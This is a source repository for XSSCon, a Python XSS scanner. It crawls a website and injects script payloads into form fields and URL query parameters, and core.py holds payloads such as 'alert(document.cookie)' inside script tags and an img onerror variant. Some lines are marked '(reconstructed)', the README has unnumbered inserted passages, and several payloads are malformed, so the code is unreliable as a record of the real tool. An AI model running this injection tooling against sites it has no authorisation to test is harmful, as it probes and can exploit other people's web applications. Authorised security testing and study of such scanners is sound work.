├── LICENSE
├── README.md
├── images
│   ├── logo.png
│   └── screenshot.png
├── lib
│   ├── core.py
│   ├── crawler
│   │   └── crawler.py
│   └── helper
│       ├── Log.py
│       └── helper.py
├── requirements.txt
└── xsscon.py
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 menkrep1337
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | ![XSSCon](images/logo.png)
3 | A powerful XSS scanner written in Python 3.7
4 |
5 |
6 | ## Installing
7 |
8 | Requirements:
9 |
10 | BeautifulSoup4
11 |
12 | ```bash
13 | pip install bs4
14 | ```
15 | requests
16 |
17 | ```bash
18 | pip install requests
19 | ```
20 | Python 3.7
21 |
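Both dependencies can also be installed in one step from the bundled `requirements.txt` (note that `bs4` on PyPI is a thin wrapper package that pulls in `beautifulsoup4`):

```bash
pip install -r requirements.txt
```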
22 | Commands:
23 |
24 | ```bash
25 | git clone https://github.com/menkrep1337/XSSCon
26 | chmod -R 755 XSSCon
27 | cd XSSCon
28 | python3 xsscon.py --help
29 | ```
30 | ## Usage
31 | Basic usage:
32 |
33 | ```bash
34 | python3 xsscon.py -u http://testphp.vulnweb.com
35 | ```
36 |
37 | Advanced usage:
38 |
39 | ```bash
40 | python3 xsscon.py --help
41 | ```
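
The options listed by `--help` can be combined. For example (all flags below are defined in `xsscon.py`; the cookie value shown is simply the tool's default, passed explicitly):

```bash
# crawl two levels deep, sending a custom cookie with every request
python3 xsscon.py -u http://testphp.vulnweb.com --depth 2 --cookie '{"ID":"1094200543"}'

# scan a single page without crawling
python3 xsscon.py --single http://testphp.vulnweb.com
```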
42 |
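The scanner engine can also be driven from Python directly. A minimal sketch, based on the `core.main` signature in `lib/core.py` (the payload string is illustrative; any string echoed back by the target counts as a detection):

```python
from lib.core import core
from lib.helper.helper import agent  # default User-Agent header dict

core.main(
    "http://testphp.vulnweb.com",   # target URL
    None,                           # proxies dict, or None for a direct connection
    agent,                          # request headers
    "<script>alert(1)</script>",    # payload injected into forms and query strings
    '{"ID":"1094200543"}',          # cookies as a JSON string (parsed with json.loads)
    2,                              # method: 0 = GET only, 1 = POST only, 2 = both
)
```
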
43 | ## Main features
44 |
45 | * Crawls all links on a website (crawler engine)
46 | * Supports both POST and GET forms
47 | * Many customizable settings
48 | * Advanced error handling
49 | * Multiprocessing support ✔️
50 | * And more...
51 |
52 |
53 | ## Screenshot
54 |
55 | ![Screenshot](images/screenshot.png)
56 |
57 | ## Roadmap
58 |
59 | v0.3B:
60 | ------
61 | Added custom options (--proxy, --user-agent, etc.)
62 |
63 |
64 | v0.3B Patch:
65 | ------
66 | Added support for forms with the GET method
67 |
68 | v0.4B:
69 | ------
70 | Improved error handling
71 | Multiple parameters for the GET method are now supported
72 |
73 | v0.5 Release (Final):
74 | ------
75 | * Bug fixes
76 | * Cookies are now supported (--cookie {})
77 | ## Note
78 | * Sorry for my bad English
79 | * If you run XSSCon in the Windows 10 terminal you will get untidy output
80 | * DOM-based XSS is not supported yet
81 |
82 |
--------------------------------------------------------------------------------
/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/menkrep1337/XSSCon/ce91fd6ff3a3e9057ea97b67792497a5be73383e/images/logo.png
--------------------------------------------------------------------------------
/images/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/menkrep1337/XSSCon/ce91fd6ff3a3e9057ea97b67792497a5be73383e/images/screenshot.png
--------------------------------------------------------------------------------
/lib/core.py:
--------------------------------------------------------------------------------
1 | from lib.helper.helper import *
2 | from random import randint
3 | from bs4 import BeautifulSoup
4 | from urllib.parse import urljoin,urlparse,parse_qs,urlencode
5 | from lib.helper.Log import *
6 |
7 | class core:
8 |
9 | @classmethod
10 | def generate(self,eff):
11 | FUNCTION=[
12 | "prompt(5000/200)",
13 | "alert(6000/3000)",
14 | "alert(document.cookie)",
15 | "prompt(document.cookie)",
16 | "console.log(5000/3000)"
17 | ]
18 | if eff == 1:
19 | return "<script>"+FUNCTION[randint(0,4)]+"<\script\>"
20 |
21 | elif eff == 2:
22 | return "<\script/>"+FUNCTION[randint(0,4)]+"<\\script>"
23 |
24 | elif eff == 3:
25 | return "<\script\> "+FUNCTION[randint(0,4)]+"/script>"
26 |
27 | elif eff == 4:
28 | return "<script>"+FUNCTION[randint(0,4)]+"</script>"
29 |
30 | elif eff == 5:
31 | return "<sCrIpT>"+FUNCTION[randint(0,4)]+"</sCrIpT>" # mixed-case filter-evasion variant (reconstructed)
32 |
33 | elif eff == 6:
34 | return "<img src=x onerror="+FUNCTION[randint(0,4)]+">" # event-handler variant (reconstructed)
35 |
36 | @classmethod
37 | def post_method(self):
38 | bsObj=BeautifulSoup(self.body,"html.parser")
39 | forms=bsObj.find_all("form",method=True)
40 |
41 | for form in forms:
42 | try:
43 | action=form["action"]
44 | except KeyError:
45 | action=self.url
46 |
47 | if form["method"].lower().strip() == "post":
48 | Log.warning("Target has a form with POST method: "+C+urljoin(self.url,action))
49 | Log.info("Collecting form input keys...")
50 |
51 | keys={}
52 | for key in form.find_all(["input","textarea"]):
53 | try:
54 | if key["type"] == "submit":
55 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+key["name"])
56 | keys.update({key["name"]:key["name"]})
57 |
58 | else:
59 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
60 | keys.update({key["name"]:self.payload})
61 |
62 | except Exception as e:
63 | Log.info("Internal error: "+str(e))
64 |
65 | Log.info("Sending payload via POST...")
66 | req=self.session.post(urljoin(self.url,action),data=keys)
67 | if self.payload in req.text:
68 | Log.high("Detected XSS (POST) at "+urljoin(self.url,req.url))
69 | Log.high("Post data: "+str(keys))
70 | else:
71 | Log.info("No XSS (POST) detected on this page, but this is not a 100% guarantee...")
72 |
73 | @classmethod
74 | def get_method_form(self):
75 | bsObj=BeautifulSoup(self.body,"html.parser")
76 | forms=bsObj.find_all("form",method=True)
77 |
78 | for form in forms:
79 | try:
80 | action=form["action"]
81 | except KeyError:
82 | action=self.url
83 |
84 | if form["method"].lower().strip() == "get":
85 | Log.warning("Target has a form with GET method: "+C+urljoin(self.url,action))
86 | Log.info("Collecting form input keys...")
87 |
88 | keys={}
89 | for key in form.find_all(["input","textarea"]):
90 | try:
91 | if key["type"] == "submit":
92 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+key["name"])
93 | keys.update({key["name"]:key["name"]})
94 |
95 | else:
96 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
97 | keys.update({key["name"]:self.payload})
98 |
99 | except Exception as e:
100 | Log.info("Internal error: "+str(e))
101 | try:
102 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload)
103 | keys.update({key["name"]:self.payload})
104 | except KeyError as e:
105 | Log.info("Internal error: "+str(e))
106 |
107 | Log.info("Sending payload via GET...")
108 | req=self.session.get(urljoin(self.url,action),params=keys)
109 | if self.payload in req.text:
110 | Log.high("Detected XSS (GET) at "+urljoin(self.url,req.url))
111 | Log.high("GET data: "+str(keys))
112 | else:
113 | Log.info("No XSS (GET) detected on this page, but this is not a 100% guarantee...")
114 |
115 | @classmethod
116 | def get_method(self):
117 | bsObj=BeautifulSoup(self.body,"html.parser")
118 | links=bsObj.find_all("a",href=True)
119 | for a in links:
120 | url=a["href"]
121 | if not (url.startswith("http://") or url.startswith("https://") or url.startswith("mailto:")): # test only relative (same-site) links
122 | base=urljoin(self.url,a["href"])
123 | query=urlparse(base).query
124 | if query != "":
125 | Log.warning("Found link with query: "+G+query+N+" Possible XSS injection point")
126 |
127 | query_payload=query.replace(query[query.find("=")+1:len(query)],self.payload,1)
128 | test=base.replace(query,query_payload,1)
129 |
130 | query_all=base.replace(query,urlencode({x: self.payload for x in parse_qs(query)}))
131 |
132 | Log.info("Query (GET) : "+test)
133 | Log.info("Query (GET) : "+query_all)
134 |
135 | _respon=self.session.get(test)
136 | if self.payload in _respon.text or self.payload in self.session.get(query_all).text:
137 | Log.high("Detected XSS (GET) at "+_respon.url)
138 | else:
139 | Log.info("No XSS (GET) detected on this page, but this is not a 100% guarantee...")
140 |
141 | @classmethod
142 | def main(self,url,proxy,headers,payload,cookie,method=2):
143 |
144 | print(W+"*"*15)
145 | self.payload=payload
146 | self.url=url
147 |
148 | self.session=session(proxy,headers,cookie)
149 | Log.info("Checking connection to: "+Y+url)
150 | try:
151 | ctr=self.session.get(url)
152 | self.body=ctr.text
153 | except Exception as e:
154 | Log.high("Internal error: "+str(e))
155 | return
156 |
157 | if ctr.status_code > 400:
158 | Log.info("Connection failed "+G+str(ctr.status_code))
159 | return
160 | else:
161 | Log.info("Connection established "+G+str(ctr.status_code))
162 |
163 | if method >= 2:
164 | self.post_method()
165 | self.get_method()
166 | self.get_method_form()
167 |
168 | elif method == 1:
169 | self.post_method()
170 |
171 | elif method == 0:
172 | self.get_method()
173 | self.get_method_form()
--------------------------------------------------------------------------------
/lib/crawler/crawler.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from lib.helper.Log import *
3 | from lib.helper.helper import *
4 | from lib.core import *
5 | from bs4 import BeautifulSoup
6 | from urllib.parse import urljoin
7 | from multiprocessing import Process
8 |
9 | class crawler:
10 |
11 | visited=[]
12 |
13 | @classmethod
14 | def getLinks(self,base,proxy,headers,cookie):
15 |
16 | lst=[]
17 |
18 | conn=session(proxy,headers,cookie)
19 | text=conn.get(base).text
20 | isi=BeautifulSoup(text,"html.parser")
21 |
22 |
23 | for obj in isi.find_all("a",href=True):
24 | url=obj["href"]
25 |
26 | if url.startswith("http://") or url.startswith("https://"):
27 | continue
28 |
29 | elif url.startswith("mailto:") or url.startswith("javascript:"):
30 | continue
31 |
32 | elif urljoin(base,url) in self.visited:
33 | continue
34 |
35 | else:
36 | lst.append(urljoin(base,url))
37 | self.visited.append(urljoin(base,url))
38 |
39 | return lst
40 |
41 | @classmethod
42 | def crawl(self,base,depth,proxy,headers,level,method,cookie):
43 |
44 | urls=self.getLinks(base,proxy,headers,cookie)
45 |
46 | for url in urls:
47 |
48 | p=Process(target=core.main, args=(url,proxy,headers,level,cookie,method))
49 | p.start()
50 | p.join()
51 | if depth != 0:
52 | self.crawl(url,depth-1,proxy,headers,level,method,cookie)
53 |
54 | else:
55 | break
--------------------------------------------------------------------------------
/lib/helper/Log.py:
--------------------------------------------------------------------------------
1 | '''
2 | XSSCon - 2019/2020
3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license
5 | '''
6 | from lib.helper.helper import *
7 | from datetime import datetime
8 | class Log:
9 |
10 | @classmethod
11 | def info(self,text):
12 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+G+"INFO"+N+"] "+text)
13 |
14 | @classmethod
15 | def warning(self,text):
16 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+Y+"WARNING"+N+"] "+text)
17 |
18 | @classmethod
19 | def high(self,text):
20 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+R+"CRITICAL"+N+"] "+text)
21 |
--------------------------------------------------------------------------------
/lib/helper/helper.py:
--------------------------------------------------------------------------------
1 | '''
2 | XSSCon - 2019/2020
3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license
5 | '''
6 | import requests, json
7 | ##### Colors ######
8 | N = '\033[0m'
9 | W = '\033[1;37m'
10 | B = '\033[1;34m'
11 | M = '\033[1;35m'
12 | R = '\033[1;31m'
13 | G = '\033[1;32m'
14 | Y = '\033[1;33m'
15 | C = '\033[1;36m'
16 | ##### Styling ######
17 | underline = "\033[4m"
18 | ##### Default ######
19 | agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
20 | line="—————————————————"
21 | #####################
22 | def session(proxies,headers,cookie):
23 | r=requests.Session()
24 | r.proxies=proxies
25 | r.headers=headers
26 | r.cookies.update(json.loads(cookie))
27 | return r
28 |
29 | logo=G+"""__ ______ ____ ____
30 | \ \/ / ___/ ___| / ___|___ _ __
31 | \ /\___ \___ \| | / _ \| '_ \ %s
32 | / \ ___) |__) | |__| (_) | | | | %s
33 | /_/\_\____/____/ \____\___/|_| |_|
34 | """%(R+"{v0.5 Final}"+G,underline+C+"https://github.com/menkrep1337/XSSCon"+N+G)
35 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | bs4 >= 0.0.1
2 | requests >= 2.0.0
--------------------------------------------------------------------------------
/xsscon.py:
--------------------------------------------------------------------------------
1 | '''
2 | XSSCon - 2019/2020
3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license
5 | '''
6 | import argparse
7 | from lib.helper.helper import *
8 | from lib.helper.Log import *
9 | from lib.core import *
10 | from random import randint
11 | from lib.crawler.crawler import *
12 | epilog="""
13 | Github: https://www.github.com/menkrep1337/XSSCon
14 | Version: 0.5 Final
15 | """
16 | def check(getopt):
17 | payload=int(getopt.payload_level)
18 | if payload > 6 and getopt.payload is None:
19 | Log.info("Do you want to use a custom payload (y/N)?")
20 | answer=input("> "+W)
21 | if answer.lower().strip() == "y":
22 | Log.info("Write the XSS payload below")
23 | payload=input("> "+W)
24 | else:
25 | payload=core.generate(randint(1,6))
26 |
27 | else:
28 | payload=core.generate(payload)
29 |
30 | return payload if getopt.payload is None else getopt.payload
31 |
32 | def start():
33 | parse=argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,usage="XSSCon -u [options]",epilog=epilog,add_help=False)
34 |
35 | pos_opt=parse.add_argument_group("Options")
36 | pos_opt.add_argument("--help",action="store_true",default=False,help="Show usage and help parameters")
37 | pos_opt.add_argument("-u",metavar="",help="Target url (e.g. http://testphp.vulnweb.com)")
38 | pos_opt.add_argument("--depth",metavar="",help="Depth web page to crawl. Default: 2",default=2)
39 | pos_opt.add_argument("--payload-level",metavar="",help="Level for payload Generator, 7 for custom payload. {1...6}. Default: 6",default=6)
40 | pos_opt.add_argument("--payload",metavar="",help="Load custom payload directly (e.g. <script>alert(1)</script>)",default=None)
41 | pos_opt.add_argument("--method",metavar="",help="Method setting(s): \n\t0: GET\n\t1: POST\n\t2: GET and POST (default)",default=2,type=int)
42 | pos_opt.add_argument("--user-agent",metavar="",help="Request user agent (e.g. Chrome/2.1.1/...)",default=agent)
43 | pos_opt.add_argument("--single",metavar="",help="Single scan: no crawling, just one address")
44 | pos_opt.add_argument("--proxy",default=None,metavar="",help="Set proxy (e.g. {'https':'https://10.10.1.10:1080'})")
45 | pos_opt.add_argument("--about",action="store_true",help="Print information about XSSCon tool")
46 | pos_opt.add_argument("--cookie",help="Set cookie (e.g {'ID':'1094200543'})",default='''{"ID":"1094200543"}''',metavar="")
47 |
48 | getopt=parse.parse_args()
49 | print(logo)
50 | Log.info("Starting XSSCon...")
51 | if getopt.u:
52 | core.main(getopt.u,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method)
53 |
54 | crawler.crawl(getopt.u,int(getopt.depth),getopt.proxy,getopt.user_agent,check(getopt),getopt.method,getopt.cookie)
55 |
56 | elif getopt.single:
57 | core.main(getopt.single,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method)
58 |
59 | elif getopt.about:
60 | print("""
61 | ***************
62 | Project: XSSCon
63 | License: MIT
64 | Author: menkrep1337
65 | Last update: 2019 May 26
66 | Note: Use at your own RISK
67 | ****************
68 | """+epilog)
69 | else:
70 | parse.print_help()
71 |
72 | if __name__=="__main__":
73 | start()
74 |
--------------------------------------------------------------------------------